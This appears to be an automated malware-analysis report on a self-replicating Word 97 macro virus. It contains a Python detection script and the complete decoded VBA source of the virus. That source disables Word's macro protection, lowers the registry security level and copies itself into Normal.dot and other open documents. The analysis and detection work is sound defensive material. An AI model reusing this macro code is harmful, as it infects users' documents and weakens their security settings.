Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 13a31331c076e5c7…

MALICIOUS

Office (OLE)

Size: 35.0 KB
Created: 1997-06-19 09:44:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: f8b60886f4ce1746b9b74676b9195909
SHA-1: 56cd2fc263ce28e2be567ae43e32968d8f4c00d8
SHA-256: 13a31331c076e5c73279484e6810e392d235d6ed6d1d19638d908317def14458
Risk score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a Word 97-format document whose VBA project carries a Document_Open macro, an auto-execute entry point that runs as soon as the document is opened. Rather than dropping a separate payload, the macro is a self-replicating macro virus. It first switches off Word's macro virus warning (Options.VirusProtection = 0), suppresses alerts, screen updating and Ctrl+Break, and writes Level = 1 (Low) to HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security, the Word 2000 macro security setting. It then exports its own code module (VBProject.VBComponents(1).Export) to a randomly named file under %SystemRoot%\TEMP\ (the ".\TEMP\" suffix resolves to that directory because Win32 path normalisation drops the trailing dot), strips the four header lines and everything after the trailing marker comment, writes the cleaned body back, and records the file name in a Word registry value via System.ProfileString("", "DefaultFileName"). Finally it imports that file with CodeModule.AddFromFile: when running from an infected document it targets the first module of Normal.dot and renames the entry point to Document_Open; when running from the template it targets the currently open, saved document and renames it to Document_Close. Targets whose module already contains code are skipped. The ClamAV signature Win.Trojan.Psycho-3 is consistent with this behaviour. Because only the fourth character (a letter) and the eighth (a digit) of the template name "~WR00000.TMP" are randomised, the dropped file is not a fixed IOC, but it matches the hunting pattern %SystemRoot%\TEMP\~WR[A-Z]000[0-9].TMP; the registry writes above are the other host artefacts.
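Added example (not the analyzer's code, and not from the sample or from oletools): a Python triage routine that scores decoded VBA source for the behaviours this macro shows, generalised to the Word-97-era macro-virus pattern (auto-execute entry point, Word security tampering, VBProject self-replication, module export, drop to TEMP), and that replays the two Mid() substitutions on "~WR00000.TMP" to derive and verify the file-name hunting regex. The embedded SAMPLE_VBA is a constructed excerpt of the macro above with the Greek and garbled identifiers renamed to ASCII g and a; the indicator tags, weights and verdict thresholds are this example's own choices, not values from the report.

```python
"""Heuristic triage of decoded VBA source for Word macro-virus behaviour."""
import random
import re

# Constructed input (assumption, not the analyzer's artifact): the
# behaviour-relevant lines of this sample's Document_Open macro, with the
# Greek and garbled identifiers renamed to ASCII g/a. Otherwise verbatim.
SAMPLE_VBA = r'''
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = (0)
Application.DisplayAlerts = (0)
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
g = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "SystemRoot") & ".\TEMP\"
Randomize: a = "~WR00000.TMP"
Mid(a, 4, 1) = Chr(Int((26 * Rnd) + 65))
Mid(a, 8, 1) = Int(Rnd() * 10)
VBProject.VBComponents(1).Export (g & a)
Set a = IIf(MacroContainer <> NormalTemplate, NormalTemplate, ActiveDocument).VBProject.VBComponents(1)
a.CodeModule.AddFromFile g & System.ProfileString("", "DefaultFileName")
a.CodeModule.Replaceline 2, "Private Sub " & IIf(MacroContainer <> NormalTemplate, "Document_Open()", "Document_Close()")
End Sub
'''

# (tag, weight, regex). Tags and weights are this example's own choices.
INDICATORS = [
    ("autoexec", 3,
     r"\bSub\s+(Document_Open|Document_Close|Document_New|Auto(Open|Close|Exec|New))\b"),
    ("security-tamper", 5,
     r'\bOptions\.VirusProtection\s*=|\\Word\\Security",\s*"Level"'),
    ("silence-ui", 1,
     r"\bApplication\.(DisplayAlerts|ScreenUpdating|EnableCancelKey)\s*="),
    ("registry-rw", 2, r"\bSystem\.(Private)?ProfileString\b"),
    ("self-replicate", 5,
     r"\bVBProject\.VBComponents\b|\.CodeModule\.(AddFromFile|InsertLines|ReplaceLine)\b|\bNormalTemplate\b"),
    ("module-export", 4, r"\.Export\s*\("),
    ("temp-drop", 2, r"\\TEMP\\|\.TMP\b"),
]
PATTERNS = [(tag, w, re.compile(rx, re.IGNORECASE)) for tag, w, rx in INDICATORS]


def triage(vba_source: str) -> dict:
    """Return {"score", "hits": {tag: [line numbers]}, "verdict"} for one module."""
    hits: dict[str, list[int]] = {}
    for lineno, line in enumerate(vba_source.splitlines(), 1):
        for tag, _, rx in PATTERNS:
            if rx.search(line):
                hits.setdefault(tag, []).append(lineno)
    # Each tag counts once, however many lines hit it.
    score = sum(w for tag, w, _ in PATTERNS if tag in hits)
    if "autoexec" in hits and "self-replicate" in hits:
        verdict = "macro-virus"      # runs on open/close AND writes VBA into another project
    elif score >= 3:
        verdict = "suspicious"       # auto-execute or security tampering on its own
    else:
        verdict = "benign"
    return {"score": score, "hits": hits, "verdict": verdict}


# Hunting regex derived below: only positions 4 and 8 of the template are randomised.
TEMP_NAME_RE = re.compile(r"^~WR[A-Z]000[0-9]\.TMP$")


def emulate_temp_name(rnd: random.Random) -> str:
    """Replay the macro's two Mid() substitutions on "~WR00000.TMP"."""
    name = list("~WR00000.TMP")
    name[3] = chr(int(26 * rnd.random()) + 65)  # Mid(a, 4, 1) = Chr(Int((26 * Rnd) + 65))
    name[7] = str(int(rnd.random() * 10))       # Mid(a, 8, 1) = Int(Rnd() * 10)
    return "".join(name)


def temp_name_pattern_holds(trials: int = 1000) -> bool:
    """True if every emulated drop name matches TEMP_NAME_RE (fixed seed, reproducible)."""
    rnd = random.Random(1)
    return all(TEMP_NAME_RE.match(emulate_temp_name(rnd)) for _ in range(trials))


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    print(result["verdict"], result["score"], sorted(result["hits"]))
    print("hunt for %SystemRoot%\\TEMP\\ names matching", TEMP_NAME_RE.pattern,
          "- holds:", temp_name_pattern_holds())
```

Run it directly to print the verdict and hit list for the embedded excerpt; for other samples, feed triage() the decoded output of olevba. TEMP_NAME_RE is deliberately tighter than a wildcard on ~WR*.TMP, because the emulation confirms that three of the five zeros in the template never change.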

Heuristics 3

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Auto-execute Document_Open handler: the macro runs as soon as the document is opened

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5804 bytes
SHA-256: 3bf3ef92f4135de364537ea1c66a0118204ba6692916c9a1bcf813530c658054
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Shadow
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = (0)
Options.SaveNormalPrompt = (0)
Application.DisplayAlerts = (0)
Application.ScreenUpdating = (0)
Application.EnableCancelKey = (0)
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
γ = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "SystemRoot") & ".\TEMP\"
Do While FileLen(γ & System.ProfileString("", "DefaultFileName")) = 0
Randomize: α = "~WR00000.TMP"
Mid(α, 4, 1) = Chr(Int((26 * Rnd) + 65))
Mid(α, 8, 1) = Int(Rnd() * 10)
VBProject.VBComponents(1).Export (γ & α)
Open γ & α For Input As #1
For η = 1 To 4: Line Input #1, �: Next: η = ""
Do Until ι = "'�"
Line Input #1, ι
η = η & ι & Chr(13) & Chr(10)
Loop: Close #1
Open γ & α For Output As #1: Print #1, η: Close #1
System.ProfileString("", "DefaultFileName") = α: Loop
Set α = IIf(MacroContainer <> NormalTemplate, NormalTemplate, ActiveDocument).VBProject.VBComponents(1)
If α.CodeModule.CountOfLines > 0 Or ActiveDocument.Path = "" Then Exit Sub
α.CodeModule.AddFromFile γ & System.ProfileString("", "DefaultFileName")
α.CodeModule.Replaceline 2, "Private Sub " & IIf(MacroContainer <> NormalTemplate, "Document_Open()", "Document_Close()")
End Sub
'�


' Processing file: /opt/analyzer/scan_staging/348bfa2dfb20438fb73a088c1cdb0275.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3547 bytes
' Line #0:
' 	QuoteRem 0x0000 0x002D "Copyright (C) 1998 by FlyShadow ~^^~ - Shadow"
' Line #1:
' 	FuncDefn (Private Sub Document_Open())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	LitDI2 0x0000 
' 	Paren 
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #4:
' 	LitDI2 0x0000 
' 	Paren 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #5:
' 	LitDI2 0x0000 
' 	Paren 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #6:
' 	LitDI2 0x0000 
' 	Paren 
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #7:
' 	LitDI2 0x0000 
' 	Paren 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #8:
' 	LitDI4 0x0001 0x0000 
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #9:
' 	LitStr 0x0000 ""
' 	LitStr 0x003C "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
' 	LitStr 0x000A "SystemRoot"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x0007 ".\TEMP\"
' 	Concat 
' 	St γ 
' Line #10:
' 	Ld γ 
' 	LitStr 0x0000 ""
' 	LitStr 0x000F "DefaultFileName"
' 	Ld System 
' 	ArgsMemLd ProfileString 0x0002 
' 	Concat 
' 	ArgsLd FileLen 0x0001 
' 	LitDI2 0x0000 
' 	Eq 
' 	DoWhile 
' Line #11:
' 	ArgsCall Read 0x0000 
' 	BoS 0x0000 
' 	LitStr 0x000C "~WR00000.TMP"
' 	St α 
' Line #12:
' 	LitDI2 0x001A 
' 	Ld Rnd 
' 	Mul 
' 	Paren 
' 	LitDI2 0x0041 
' 	Add 
' 	FnInt 
' 	ArgsLd Chr 0x0001 
' 	Ld α 
' 	LitDI2 0x0004 
' 	LitDI2 0x0001 
' 	Mid 
' Line #13:
' 	ArgsLd Rnd 0x0000 
' 	LitDI2 0x000A 
' 	Mul 
' 	FnInt 
' 	Ld α 
' 	LitDI2 0x0008 
' 	LitDI2 0x0001 
' 	Mid 
' Line #14:
' 	Ld γ 
' 	Ld α 
' 	Concat 
' 	Paren 
' 	LitDI2 0x0001 
' 	Ld VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #15:
' 	Ld γ 
' 	Ld α 
' 	Concat 
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Input)
' Line #16:
' 	StartForVariable 
' 	Ld η 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0004 
' 	For 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	Ld � 
' 	LineInput 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Next 
' 	BoS 0x0000 
' 	LitStr 0x0000 ""
' 	St η 
' Line #17:
' 	Ld ι 
' 	LitStr 0x0002 "'�"
' 	Eq 
' 	DoUnitil 
' Line #18:
' 	LitDI2 0x00
... (truncated)